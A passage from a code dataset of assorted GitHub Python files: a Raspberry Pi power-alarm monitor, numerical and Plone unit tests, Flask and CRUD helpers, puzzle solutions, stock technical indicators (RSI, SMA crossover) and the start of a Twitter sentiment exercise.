alarm. The recovery must be consecutive\n numberOfAlarmsLeftToTrigger = 0\n else:\n logger.warning('Read voltage is greater than the minimum voltage: {0} >= {1}'.format(adcValVolts, alarmMinVoltage))\n numberOfAlarmsLeftToTrigger = numberOfAlarmsLeftToTrigger + 1\n if (numberOfAlarmsLeftToTrigger >= alarmNTriggers):\n alarmState = AlarmState.OK\n\n #Trigger info alarms\n if (time.time() > nextInfoTrigger):\n for handler in alarmHandlers:\n handler.trigger(statusMsg, logging.INFO)\n nextInfoTrigger = time.time() + infoPeriod\n logger.info('Going to trigger next information alarm at {0}'.format(time.strftime('%d %b %Y %H:%M:%S', time.gmtime(nextInfoTrigger))))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description = 'Measure the power on the defined ADC and trigger an alarm if the power is lower than a given value')\n parser.add_argument('-a', '--adc', type=int, default=1, help='ADC #')\n parser.add_argument('-p', '--period', type=float, default=2, help='Period at which the ADC value is read')\n parser.add_argument('-am', '--alarm_min', type=float, help='A measured voltage (in Volts) under this value is considered an alarming voltage', default = 0.7)\n parser.add_argument('-at', '--alarm_tri', type=int, help='An alarm is triggered if N consecutive alarming voltages are detected', default = 1)\n parser.add_argument('-eu', '--email_user', type=str, required=True, help='email username')\n parser.add_argument('-ep', '--email_pass', type=str, required=True, help='email password')\n parser.add_argument('-ed', '--email_dest', type=str, required=True, help='email destination')\n parser.add_argument('-ip', '--info_period', type=int, default=(3600 * 12), help='Send information (and heartbeat) with the current information every args.info_period seconds (even if no alarm was triggered)')\n parser.add_argument('-bp', '--buzzer_pin', type=int, default=27, help='Buzzer wiringpi pin')\n parser.add_argument('-bd', '--buzzer_duration', type=int, default=30, help='Buzzer alarm duration')\n logLevels = ['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL']\n parser.add_argument('-ll', '--log_level', type=str, default='INFO', help='Log level', choices = logLevels)\n\n args = parser.parse_args()\n loggingCriticalities = {'DEBUG': logging.DEBUG, 'INFO': logging.INFO, 'WARNING': logging.WARNING, 'ERROR': logging.ERROR, 'CRITICAL': logging.CRITICAL}\n logger.setLevel(loggingCriticalities[args.log_level])\n consoleHandler.setLevel(loggingCriticalities[args.log_level])\n syslogHandler.setLevel(loggingCriticalities[args.log_level])\n\n alarmNTriggers = 1\n if (args.alarm_tri > 1):\n alarmNTriggers = args.alarm_tri\n\n #Setup\n wpi.wiringPiSetup()\n\n emailAlarmHandler = EMailAlarmHandler(args.email_user, args.email_pass, args.email_dest)\n buzzerAlarmHandler = BuzzerAlarmHandler(args.buzzer_pin, args.buzzer_duration)\n monitor(args.adc, args.period, args.alarm_min, args.alarm_tri, [emailAlarmHandler, buzzerAlarmHandler], args.info_period)\n\n","repo_name":"aneto0/powerdetector","sub_path":"powerdetector.py","file_name":"powerdetector.py","file_ext":"py","file_size_in_byte":10184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"9539001992","text":"import os\nimport string\n\nimport numpy as np\nimport pandas as pd\nimport statsmodels.api as sm\nfrom numpy.testing import assert_almost_equal, assert_equal, assert_raises\nfrom scipy.interpolate import interp1d\nimport netCDF4 as nc\n\nfrom pymarine.utils.numerical import (\n get_nearest_index,\n find_idx_nearest_val,\n ecdf2percentile,\n get_column_with_max_cumulative_value,\n get_range_from_string,\n extrap1d,\n loadmat,\n print_mat_nested,\n)\n\nDATA_DIR = \"data\"\nMATLAB_DATAFILE = \"RAO_7.mat\"\n\n\ndef test_get_nearest_index():\n data = np.linspace(0, 10, 27)\n index = get_nearest_index(data, 3)\n index_expected = 7\n\n assert_equal(index, index_expected)\n\n # check if an assertion error is raised\n data_array = np.array([3, 0, 2, 4, 2, 1])\n with assert_raises(AssertionError):\n get_nearest_index(data_array, value=2.1)\n\n\ndef test_find_idx_nearest_val():\n data = np.linspace(0, 10, 27)\n index = find_idx_nearest_val(data, 3)\n index_expected = 8\n\n assert_equal(index, index_expected)\n\n data_array = np.array([3, 0, 2, 4, 2, 1])\n a = find_idx_nearest_val(data_array, value=2.1)\n assert_equal(a, 4)\n\n data_array = np.array([3, 0, 2, 4, 2, 1, 2])\n a = find_idx_nearest_val(data_array, value=2.1)\n assert_equal(a, 6)\n\n data_array = np.array([3, 0, 2, 4, 2.11, 1, 2])\n a = find_idx_nearest_val(data_array, value=2.1)\n assert_equal(a, 4)\n\n\ndef test_ecdf2percentile():\n np.random.seed(0)\n number_of_observations = 100\n # generate random data variing in between 0 and 100\n x_data = 100 * np.random.rand(number_of_observations)\n # calculate the cumulative distribution function of this random data using statsmodel\n e_cdf = sm.distributions.empirical_distribution.ECDF(x_data)\n\n result = [\n ecdf2percentile(ecdf=e_cdf, percentile=x)\n for x in np.linspace(0, 1, 10, endpoint=False)\n ]\n result_expected = np.array(\n [\n 0.46954761925470656,\n 9.6098407893963067,\n 14.335328740904639,\n 26.538949093944542,\n 38.344151882577769,\n 46.865120164770161,\n 57.594649555617927,\n 65.632958946527339,\n 77.423368943421664,\n 89.177300078207978,\n ]\n )\n\n assert_almost_equal(result, result_expected)\n\n\ndef test_get_column_with_max_cumulative_value():\n np.random.seed(0)\n n_cols = 5\n n_rows = 10\n # create a 10 x 5 data frame with random values with columns named as A, B, C, etc\n data_frame = pd.DataFrame(\n np.random.random_sample((n_rows, n_cols)),\n columns=list(string.ascii_uppercase)[:n_cols],\n )\n # obtain the name of the column with the maximum cumulative value\n col1 = get_column_with_max_cumulative_value(data_frame)\n col2 = get_column_with_max_cumulative_value(data_frame, regular_expression=\"[ABC]\")\n\n assert_equal(col1, \"D\")\n assert_equal(col2, \"C\")\n\n\ndef test_get_range_from_string():\n r1 = get_range_from_string(\"0:10:2\")\n r1_expected = np.array([0.0, 2.0, 4.0, 6.0, 8.0, 10.0])\n assert_almost_equal(r1, r1_expected)\n\n r2 = get_range_from_string(\"0:7\")\n r2_expected = np.array([0.0, 1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0])\n assert_almost_equal(r2, r2_expected)\n\n r3 = get_range_from_string(\"3:4:0.2\")\n r3_expected = np.array([3.0, 3.2, 3.4, 3.6, 3.8, 4.0])\n assert_almost_equal(r3, r3_expected)\n\n\ndef test_extrap1d():\n # create\n xp = np.linspace(0, 2 * np.pi, 20)\n yp = np.sin(xp)\n f_inter = interp1d(xp, yp)\n\n f_extra = extrap1d(f_inter)\n\n xp_new = np.linspace(-0.1 * np.pi, 2.1 * np.pi, 20)\n yp_new = f_extra(xp_new)\n\n yp_exp = np.array(\n [\n -0.3084645,\n 0.0487049,\n 0.3970778,\n 0.6922465,\n 0.8966717,\n 0.9843516,\n 0.9440572,\n 0.7807363,\n 0.5149139,\n 0.1801622,\n -0.1801622,\n -0.5149139,\n -0.7807363,\n -0.9440572,\n -0.9843516,\n -0.8966717,\n -0.6922465,\n -0.3970778,\n -0.0487049,\n 0.3084645,\n ]\n )\n\n debug_plot = False\n if debug_plot:\n import matplotlib.pyplot as plt\n\n plt.plot(xp_new, yp_new, \"-o\")\n plt.plot(xp, yp, \"x\")\n plt.show()\n\n assert_almost_equal(yp_new, yp_exp)\n\n\ndef test_load_matlab():\n # construct the matlab and netcdf data file name\n file_name = os.path.join(DATA_DIR, MATLAB_DATAFILE)\n if not os.path.exists(file_name):\n file_name = os.path.join(\"..\", file_name)\n file_name_nc = os.path.splitext(file_name)[0] + \".nc\"\n # read the matlab data and make a reference to the RAO data, which is a 24 x 250 x 6 array\n data_ml = loadmat(filename=file_name)\n data = data_ml[\"RAO\"]\n\n # read the netcdf data\n data_nc = nc.Dataset(file_name_nc)\n\n # loop over the 6 DOF components\n variable_base = \"TowO_ACC\"\n for i_rao, dof_name in enumerate([\"AX\", \"AY\", \"AZ\", \"RXX\", \"RYY\", \"RZZ\"]):\n # the matlab file contains complex rao component at the indices 0..5\n rao_2d = data[:, :, i_rao]\n\n # convert the complex values in 2 2D arrays with the magnitude and phase. Transpose as well\n rao_abs = abs(rao_2d).T\n rao_phase = np.angle(rao_2d).T\n\n # the net cdf file contains the separate magnitude and phase of the complex stored as named arrays\n rao_abs_nc = data_nc.variables[\"_\".join([variable_base, dof_name, \"abs\"])]\n rao_phase_nc = data_nc.variables[\"_\".join([variable_base, dof_name, \"phase\"])]\n\n # check if the 2D arrays are equal\n assert_almost_equal(rao_abs, rao_abs_nc)\n assert_almost_equal(rao_phase, rao_phase_nc)\n\n print_mat_nested(data)\n print(data_nc.description)\n print(data_nc.description)\n","repo_name":"eelcovv/pymarine","sub_path":"tests/test_numerical.py","file_name":"test_numerical.py","file_ext":"py","file_size_in_byte":5831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"6194142803","text":"from flask import Blueprint, jsonify, request\n\n\ndef add_skill_route(Skills, db):\n add_skill_bp = Blueprint(\"add_skill\", __name__)\n\n @add_skill_bp.route(\"/api/add_skill\", methods=[\"POST\"])\n def add_skill():\n \"\"\" \"\"\"\n if request.method == \"POST\":\n data = request.get_json()\n name = data.get(\"name\")\n category = data.get(\"category\")\n\n new_skill = Skills(\n name=name,\n category=category,\n )\n\n db.session.add(new_skill)\n db.session.commit()\n\n return jsonify({\"message\": \"skill added successfully\"})\n\n return add_skill_bp\n","repo_name":"WomenPlusPlus/deploy-impact-23-shift-4","sub_path":"server/routes/skills/add_skill.py","file_name":"add_skill.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32285289465","text":"def calcTime(time):\n hr, mi = time.split(\":\")\n total = int(hr) * 60 + int(mi)\n return total\n\n\ndef word(song, minus, m):\n music = song\n print(song, len(song), minus)\n while len(music) < minus:\n music += song\n if len(music) > minus:\n music = music[:minus]\n\n print(music, \"--------\")\n\n if m[-1] == \"#\":\n print(\"##\")\n\n for i in range(0, len(music) - len(m), 1):\n print(music[i:i + len(m)])\n if music[i:i + len(m)] == m:\n return True\n return False\n\n # for i in range(0,len(music)-len(m),1):\n # if music[i:i+len(m)] == m:\n # if m[-1]!=\"#\":\n # if i+len(m) Location:\n return (\n db_session.query(DBLocation)\n .filter(DBLocation.id == location_id)\n .first()\n )\n\n\ndef get_by_name(db_session, *, name: str) -> Optional[Location]:\n return db_session.query(DBLocation).filter(DBLocation.name == name).first()\n\n\ndef get_multi(db_session, *, skip=0, limit=100) -> List[Optional[Location]]:\n return db_session.query(DBLocation).offset(skip).limit(limit).all()\n\n\ndef create(db_session, *, location_in: LocationInCreate) -> Location:\n location = DBLocation(name=location_in.name, address=location_in.address)\n db_session.add(location)\n db_session.commit()\n db_session.refresh(location)\n return location\n\n\ndef update(\n db_session, *, location: DBLocation, location_in: LocationInUpdate\n) -> Location:\n location_data = jsonable_encoder(location)\n for field in location_data:\n if field in location_in.fields:\n value_in = getattr(location_in, field)\n if value_in is not None:\n setattr(location, field, value_in)\n location.updated_at = str(datetime.datetime.now())\n db_session.add(location)\n db_session.commit()\n db_session.refresh(location)\n return location\n\n\ndef delete(db_session, *, location_id: int) -> bool:\n location = get(db_session, location_id=location_id)\n if location:\n db_session.delete(location)\n db_session.commit()\n return True\n return False\n","repo_name":"5legs/testapi","sub_path":"app/app/crud/location.py","file_name":"location.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28445416682","text":"from inputs import test_input_1, test_input_3, challlenge_input\nfrom graph import Graph, dijsktra\n\ndoors = set()\nrooms = set()\n\ndef handle_next_position(position, w: str):\n if w == \"N\":\n new_doors = (position[0], position[1] + 1)\n new_room = (position[0], position[1] + 2)\n doors.add(new_doors)\n rooms.add(new_room)\n return new_room\n elif w == \"E\":\n new_doors = (position[0] + 1, position[1])\n new_room = (position[0] + 2, position[1])\n doors.add(new_doors)\n rooms.add(new_room)\n return new_room\n if w == \"W\":\n new_doors = (position[0] - 1, position[1])\n new_room = (position[0] - 2, position[1])\n doors.add(new_doors)\n rooms.add(new_room)\n return new_room\n elif w == \"S\":\n new_doors = (position[0], position[1] - 1)\n new_room = (position[0], position[1] - 2)\n doors.add(new_doors)\n rooms.add(new_room)\n return new_room\n\n\n\ndef parse_parentheses(s):\n x, y = 0, 0\n positions = []\n\n for c in s:\n if c == \"(\":\n positions.append((x, y))\n elif c == \")\":\n x, y = positions.pop()\n elif c == \"|\":\n x, y = positions[-1]\n else:\n x, y = handle_next_position((x, y), c)\n\n\n\ndef print_area():\n min_x = min(min([d[0] for d in doors]), min([r[0] for r in rooms])) - 1\n max_x = max(max([d[0] for d in doors]), max([r[0] for r in rooms])) + 1\n\n min_y = min(min([d[1] for d in doors]), min([r[1] for r in rooms])) - 1\n max_y = max(max([d[1] for d in doors]), max([r[1] for r in rooms])) + 1\n\n for y in range(max_y, min_y - 1, -1):\n for x in range(min_x, max_x + 1):\n if (x, y) == (0, 0):\n print(\"X\", end=\"\")\n elif (x, y) in doors:\n print(\"|\", end=\"\")\n elif (x, y) in rooms:\n print(\".\", end=\"\")\n else:\n print(\"#\", end=\"\")\n print()\n\nparse_parentheses(challlenge_input)\n\ng = Graph()\n\nfor room in rooms:\n\n place_north = (room[0], room[1] + 1)\n room_north = (room[0], room[1] + 2)\n place_south = (room[0], room[1] - 1)\n room_south = (room[0], room[1] - 2)\n place_east = (room[0] + 1, room[1])\n room_east = (room[0] + 2, room[1])\n place_west = (room[0] - 1, room[1])\n room_west = (room[0] - 2, room[1])\n\n if place_north in doors and room_north in rooms:\n g.add_edge(room, room_north, 1)\n\n if place_south in doors and room_south in rooms:\n g.add_edge(room, room_south, 1)\n\n if place_east in doors and room_east in rooms:\n g.add_edge(room, room_east, 1)\n\n if place_west in doors and room_west in rooms:\n g.add_edge(room, room_west, 1)\n\n\nstart_north = (0, 1)\nstart_east = (1, 0)\nstart_south = (0, -1)\nstart_west = (-1, 0)\n\nif start_north in doors:\n g.add_edge((0, 0), (0, 2), 1)\n\nif start_east in doors:\n g.add_edge((0, 0), (2, 0), 1)\n\nif start_south in doors:\n g.add_edge((0, 0), (0, -2), 1)\n\nif start_west in doors:\n g.add_edge((0, 0), (-2, 0), 1)\n\npaths = {}\nprint(len(rooms))\nfor room in rooms:\n paths[room] = len(dijsktra(g, (0, 0), room))\n\nm = max(paths, key=paths.get)\nprint(m, paths[m] - 1)\n\nprint(len([x for x in paths.values() if x - 1 >= 1000]))\n","repo_name":"rprusak/advent_of_code2018","sub_path":"20/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":3273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8827004666","text":"##this module is only use for turn off pi !!!\nimport socket\nimport time\nfrom threading import Thread\n\nclass sendtopi:\n def __init__(self,HOST,PORT):\n self.timedeta = time.time()\n self.laststage = None\n self.HOST = HOST\n self.PORT = PORT\n pass\n\n def senddata(self, data):\n #if time.time() - self.timedeta > 1:# and data != self.laststage:\n # if data != self.laststage:\n t0 = Thread(target=self.start, args=(data,))\n t0.daemon = True\n t0.start()\n self.laststage = data\n self.timedeta = time.time()\n\n def start(self, data):\n #try:\n #print(data)\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((self.HOST, self.PORT))\n s.send(data)\n #print(s.recv(1024))\n s.close()\n #except:\n #print(\"false to connect\")\n return s.recv(1024)\n","repo_name":"Cemu0/fallpesondetection","sub_path":"customlib/sendtopi.py","file_name":"sendtopi.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42182875552","text":"from selenium.webdriver.common.by import By\nfrom pages.base_page import BasePage\n\nclass Footer(BasePage):\n\n title_locator = (By.XPATH, '//p[text()=\"Product Collections\"]')\n GOOGLE_PLAY_LINK = (By.XPATH, '//*[@id=\"footer-website\"]/div/div[3]/div/a[2]/img')\n\n def check_product_collections_module_title_is_visible(self):\n title = self.driver.find_element(*self.title_locator)\n assert title.is_displayed(), \"Title is not visible\"\n\n def check_leads_link_Googl_Play(self):\n self.driver.execute_script(\"window.scrollTo(100,document.body.scrollHeight);\")\n google_play = self.driver.find_element(*self.GOOGLE_PLAY_LINK)\n self.driver.execute_script(\"arguments[0].click();\", google_play)\n self.driver.switch_to.window(self.driver.window_handles[1])\n expected_title = 'OpenWeather'\n assert '/play.google' in self.driver.current_url and expected_title in self.driver.title\n","repo_name":"AleksandrMax88/OpenWeatherPython","sub_path":"tests/test_pandoras_box/pages/footer.py","file_name":"footer.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8848153365","text":"# -*- coding: utf-8 -*-\n\"\"\"Test Serializer.\"\"\"\nfrom briefy.plone.interfaces import IBriefyPloneJSONLayer\nfrom briefy.plone.testing import INTEGRATION_TESTING\nfrom plone import api\nfrom plone.app.testing import setRoles\nfrom plone.app.testing import TEST_USER_ID\nfrom plone.restapi.interfaces import ISerializeToJson\nfrom zope.component import getMultiAdapter\nfrom zope.interface import directlyProvidedBy\nfrom zope.interface import directlyProvides\n\nimport unittest2 as unittest\n\n\nclass TestSerialization(unittest.TestCase):\n \"\"\"Test case for ISerializeToJson adapters.\"\"\"\n\n layer = INTEGRATION_TESTING\n\n def _create_content(self, portal):\n \"\"\"Create dummy content for our tests.\"\"\"\n en = portal['en']\n home = en['home']\n self.composite = home\n api.content.create(\n type='block_checker',\n id='block_1',\n container=home,\n title='Checker',\n description='Checker'\n )\n self.block_checker = home['block_1']\n for idx in range(1, 4):\n api.content.create(\n type='row_block_checker',\n id='row_{0}'.format(idx),\n container=self.block_checker,\n title='Row {0}'.format(idx),\n description='Row {0}'.format(idx)\n )\n\n def setUp(self):\n \"\"\"Setup testcase.\"\"\"\n self.portal = self.layer['portal']\n self.request = self.layer['request']\n setRoles(self.portal, TEST_USER_ID, ['Manager'])\n self._create_content(self.portal)\n\n def serialize(self, content):\n \"\"\"Run the serializer for this content.\"\"\"\n ifaces = [IBriefyPloneJSONLayer, ] + list(\n directlyProvidedBy(self.request)\n )\n directlyProvides(self.request, *ifaces)\n serializer = getMultiAdapter(\n (content, self.request), ISerializeToJson\n )\n return serializer()\n\n def test_composite(self):\n \"\"\"Test serialization of a Composite Page.\"\"\"\n content = self.composite\n data = self.serialize(content)\n self.assertEqual(data['@type'], 'composite')\n self.assertEqual(data['id'], 'home')\n self.assertEqual(data['items_total'], 1)\n self.assertIsNotNone(data['breadcrumbs'])\n # Style\n self.assertTrue(data['display_header'])\n self.assertTrue(data['display_footer'])\n # SEO\n self.assertEqual(\n data['canonical_url'],\n 'http://localhost:8080/home'\n )\n self.assertEqual(data['robots'], 'index')\n\n def test_block_checker(self):\n \"\"\"Test serialization of a Block Checker.\"\"\"\n content = self.block_checker\n data = self.serialize(content)\n self.assertEqual(data['@type'], 'block_checker')\n self.assertEqual(data['title'], 'Checker')\n self.assertEqual(data['items_total'], 3)\n self.assertIsNotNone(data['breadcrumbs'])\n # Style\n self.assertIsNone(data['css_class'])\n self.assertIsNone(data['style_background_color'])\n self.assertIsNone(data['style_color'])\n self.assertIsNone(data['style_margin'])\n self.assertIsNone(data['style_padding'])\n","repo_name":"BriefyHQ/briefy.plone","sub_path":"src/briefy/plone/adapters/tests/test_serializer.py","file_name":"test_serializer.py","file_ext":"py","file_size_in_byte":3203,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"38601831881","text":"# may be a repetition classifier\r\nfrom .classifier import Classifier\r\nfrom .models.load import predict, load_data, load_model\r\n\r\nclass Query(Classifier):\r\n def __init__(self, config):\r\n self.config = config\r\n self.classified = False\r\n self.next_state = self.QUERIED\r\n self.words_list = ['什么',\r\n '再讲一遍']\r\n self.text_field, self.label_field = load_data(target=\"0\", config=config)\r\n self.model = load_model(\"FastText\", \"request.pt\", self.text_field, config)\r\n\r\n # cfg_needed, intention, sub-intention\r\n def get_intention(self):\r\n self.classified = False\r\n return True, \"welcome\", \"explanation\"\r\n\r\n\r\n def do_classification(self, sentence):\r\n if self.config.USE_MODEL:\r\n self.classified = predict(self.model, self.text_field, self.label_field, sentence, self.config)\r\n return self.next_state\r\n else:\r\n super().do_classification(sentence)\r\n","repo_name":"XLab-Tongji/SemanticAnalysis","sub_path":"AI/Classifiers/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"9916675100","text":"#Ali Goldstein\r\n#program with a recursive function to calculate whether or not a string is a palindrome\r\n#8 May 2014\r\n\r\ndef isPalindrome(string):\r\n if len(string) == 1 or len (string) == 0:\r\n return True\r\n #seeing if the first and last character of the string is the same\r\n #if it is, doing it again\r\n if string[0]==string[-1]:\r\n if isPalindrome(string[1:-1]) == True:\r\n return True\r\n else:\r\n return False\r\n else:\r\n return False\r\n\r\n#prompt user to enter a string and then print out if its a palindrome or not\r\nstring=input(\"Enter a string: \\n\")\r\nif isPalindrome(string) == True:\r\n print(\"Palindrome!\")\r\nif isPalindrome (string) == False:\r\n print(\"Not a palindrome!\")\r\n\r\n\r\n \r\n \r\n ","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_8/gldali005/question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32913996262","text":"import pandas as pd\nimport numpy as np\n\n\nclass RSI():\n\n def __init__(self, data, time_period=14, overbought_level=70, oversold_level=30):\n self.data = data\n self.dates = data.Dates.tolist()\n # self.wk_days = data.WeekDays\n self.close = self.data.Close\n self.T = time_period\n self.overbought_level = overbought_level\n self.oversold_level = oversold_level\n self.signal_values_df = self.get_num_signal_df()\n self.num_sig_np_array = self.get_num_signal_np_array()\n self.cat_sig_list = self.get_cat_sig_labels()\n\n def get_num_signal_df(self):\n samples_num = len(self.data)\n num_sig_np_array = self.get_num_signal_np_array().values\n num_sig_dict = {\"Dates\":self.dates, \"Close\":self.close.values, \"SignalValues\":num_sig_np_array}\n num_sig_df = pd.DataFrame(num_sig_dict, index=range(samples_num))\n return num_sig_df\n\n def get_num_signal_np_array(self):\n \"\"\"Relative Strength Index (RSI) is a momentum oscillator that measures the speed and change of price movements.\n RSI oscillates between zero and 100. Traditionally, and according to Wilder, RSI is considered overbought when above 70 and oversold when below 30.\n Signals can also be generated by looking for divergences, failure swings and centerline crossovers.\n RSI can also be used to identify the general trend.\"\"\"\n\n ## get the price diff\n # delta = self.close.diff()[1:]\n delta = self.close.diff()\n\n ## positive gains (up) and negative gains (down) Series\n up, down = delta.copy(), delta.copy()\n up[up < 0] = 0\n down[down > 0] = 0\n\n # EMAs of ups and downs\n _gain = up.ewm(span=self.T, min_periods=self.T - 1).mean()\n _loss = down.abs().ewm(span=self.T, min_periods=self.T - 1).mean()\n\n RS = _gain / _loss\n result = pd.Series(100. - (100. / (1. + RS)), name=\"RSI\")\n # num_sig_np_array = np.asarray(result)\n # return num_sig_np_array\n return result\n\n def get_cat_sig_labels(self):\n signal = self.get_num_signal_np_array()\n cat_sig_list_labels = []\n for s in signal:\n if s < self.oversold_level:\n cat_sig_list_labels.append(\"Buy\")\n elif s > self.overbought_level:\n cat_sig_list_labels.append(\"Sell\")\n else:\n cat_sig_list_labels.append(\"Hold\")\n return cat_sig_list_labels\n\n\n\n\nclass SMA_CrossOver():\n\n def __init__(self, data, short_trend_period = 42, long_trend_period = 252, threshold = 5):\n self.data = data\n self.np_dates_array = data.index.values\n self.dt_dates_list = data.index.date.tolist()\n self.business_wk_days = data.Dates\n self.close = self.data.Close\n self.sttT = short_trend_period\n self.lttT = long_trend_period\n self.threshold = threshold\n self.stt = self.get_stt_and_ltt()[0]\n self.ltt = self.get_stt_and_ltt()[1]\n self.short_term_trend_period = str(self.sttT) + \"d\"\n self.long_term_trend_period = str(self.lttT) + \"d\"\n self.sma_crossover_signal_info = \"-\".join([self.short_term_trend_period, self.long_term_trend_period])\n self.signal_values_df = self.get_num_signal_df()\n self.signal_labels_df = self.get_cat_signal_df()\n self.signals_df = self.get_num_cat_signal_df()\n\n def get_stt_and_ltt(self):\n sst = np.round(self.close.rolling(window=self.sttT).mean(), 4)\n ltt = np.round(self.close.rolling(window=self.lttT).mean(), 4)\n return sst, ltt\n\n def get_num_signal_df(self):\n samples_num = len(self.data)\n sst = np.round(self.close.rolling(window=self.sttT).mean(), 4)\n ltt = np.round(self.close.rolling(window=self.lttT).mean(), 4)\n signal_values = sst - ltt\n num_sig_dict = {\"Dates\":self.dt_dates_list, \"Close\":self.close.values,\n \"SignalValues\": signal_values.values}\n num_sig_df = pd.DataFrame(num_sig_dict, index=range(samples_num))\n return num_sig_df\n\n def get_num_signal_np_array(self):\n \"\"\"\n :return: 1d numpy array row vector (len(samples_num),) and with element types:numpy.float64\n \"\"\"\n num_sig = self.signal_values_df[\"SignalValues\"].values\n return num_sig\n\n def get_cat_signal_df(self):\n samples_num = len(self.data)\n stt_minus_ltt_signal = self.signal_values_df.SignalValues\n signal = np.where(stt_minus_ltt_signal > self.threshold, \"buy\", \"hold\")\n signal = np.where(stt_minus_ltt_signal < self.threshold, \"sell\", signal)\n sig_pos_dict = {\"Dates\": self.dt_dates_list, \"Close\": self.close.values,\n \"SignalPosition\": signal}\n sig_pos_df = pd.DataFrame(sig_pos_dict, index=range(samples_num))\n return sig_pos_df\n\n def get_cat_signal_list(self):\n \"\"\"\n :return: list with length=len(samples_num) and with element types:str\n \"\"\"\n cat_sig = self.signal_labels_df[\"SignalPosition\"].tolist()\n return cat_sig\n\n def get_num_cat_signal_df(self):\n stt_minus_ltt_signal_values = self.get_num_signal_df().SignalValues.values\n signal_buy_sell_hold_position = self.get_cat_signal_df().SignalPosition.values\n samples_num = len(self.data)\n data_dict = {\"Dates\": self.dt_dates_list, \"Close\": self.close.values,\n \"SignalValues\": stt_minus_ltt_signal_values,\n \"SignalPosition\": signal_buy_sell_hold_position}\n datadf = pd.DataFrame(data_dict, index=range(samples_num))\n return datadf\n\n\n\n","repo_name":"xaviergoby/AI-Algorithmic-Trading-System","sub_path":"technical_indicators/technical_indicator_classes.py","file_name":"technical_indicator_classes.py","file_ext":"py","file_size_in_byte":5654,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"15656868939","text":"import json\nimport re\nimport canedge_browser\nimport mdf_iter\nfrom flask import Blueprint, jsonify, request\nfrom flask import current_app as app\nfrom canedge_datasource import cache\nfrom canedge_datasource.time_range import parse_time_range\n\nannotations = Blueprint('annotations', __name__)\n\n\n@annotations.route('/annotations', methods=['POST'])\ndef annotations_view():\n \"\"\"\n {\"annotation\":[NAME], [OPTIONAL]}\n\n Examples:\n {\"annotation\":\"session\", \"device\":\"AABBCCDD\"}\n {\"annotation\":\"split\", \"device\":\"AABBCCDD\"}\n \"\"\"\n\n # Caching\n @cache.memoize(timeout=50)\n def annotations_cache(req):\n\n res = []\n\n query_req = req[\"annotation\"].get(\"query\", \"\")\n try:\n annotation_req = json.loads(query_req)\n except ValueError as e:\n print(f\"Failed parse annotation: {query_req}\")\n return jsonify(res)\n\n if \"annotation\" not in annotation_req:\n print(f\"Unknown annotation {query_req}\")\n\n # Split / session annotations\n elif annotation_req[\"annotation\"] in [\"session\", \"split\"] and \"device\" in annotation_req:\n\n # Get time interval to annotate\n start_date, stop_date = parse_time_range(req[\"range\"][\"from\"], req[\"range\"][\"to\"])\n\n # Get log files in time interval\n log_files = canedge_browser.get_log_files(app.fs, annotation_req[\"device\"], start_date=start_date,\n stop_date=stop_date)\n\n for log_file in log_files:\n\n # Parse filename\n file_matches = re.match(\n r\"\\S?[0-9A-F]{8}/(?P\\d{8})/(?P\\d{8})(?:-[0-9A-F]{8}){0,1}\\.MF4$\",\n log_file,\n re.IGNORECASE)\n\n if not file_matches:\n continue\n\n session_no = file_matches.group(\"session_no\")\n split_no = file_matches.group(\"split_no\")\n\n # Only generate annotation if annotation is split or annotation is session with first split file\n if not ((annotation_req[\"annotation\"] == \"split\") or\n (annotation_req[\"annotation\"] == \"session\" and int(split_no, 10) == 1)):\n continue\n\n # Get file start time\n with app.fs.open(log_file, \"rb\") as handle:\n mdf_file = mdf_iter.MdfFile(handle)\n log_file_start_timestamp_ns = mdf_file.get_first_measurement()\n\n res.append({\n \"text\": f\"{log_file}\\n\"\n f\"Session: {int(session_no, 10)}\\n\"\n f\"Split: {int(split_no, 10)}\\n\"\n f\"Size: {app.fs.size(log_file) >> 20} MB\",\n \"time\": log_file_start_timestamp_ns / 1000000,\n })\n\n return jsonify(res)\n\n return annotations_cache(request.get_json())\n","repo_name":"AndrewA200112/CAN_Backend_logger","sub_path":"canedge-grafana-backend-main/canedge_datasource/annotations.py","file_name":"annotations.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4542431695","text":"project = open('project_twitter_data.csv','r')\nresult = open('resulting_data.csv','w')\n\npunctuation_chars = [\"'\", '\"', \",\", \".\", \"!\", \":\", \";\", '#', '@']\n\ndef strip_punctuation(str1):\n for i in punctuation_chars:\n str1 = str(str1).replace('%s' % i, '')\n \n return str1\n\n# list of positive words to use\npositive_words = []\nwith open(\"positive_words.txt\") as pos_f:\n for lin in pos_f:\n if lin[0] != ';' and lin[0] != '\\n':\n positive_words.append(lin.strip())\npositive_words.append('#incredible')\n#print(positive_words)\ndef get_pos(str1):\n #print(str1)\n \n count = 0\n stri = str1.lower()\n lst = stri.split()\n for item in 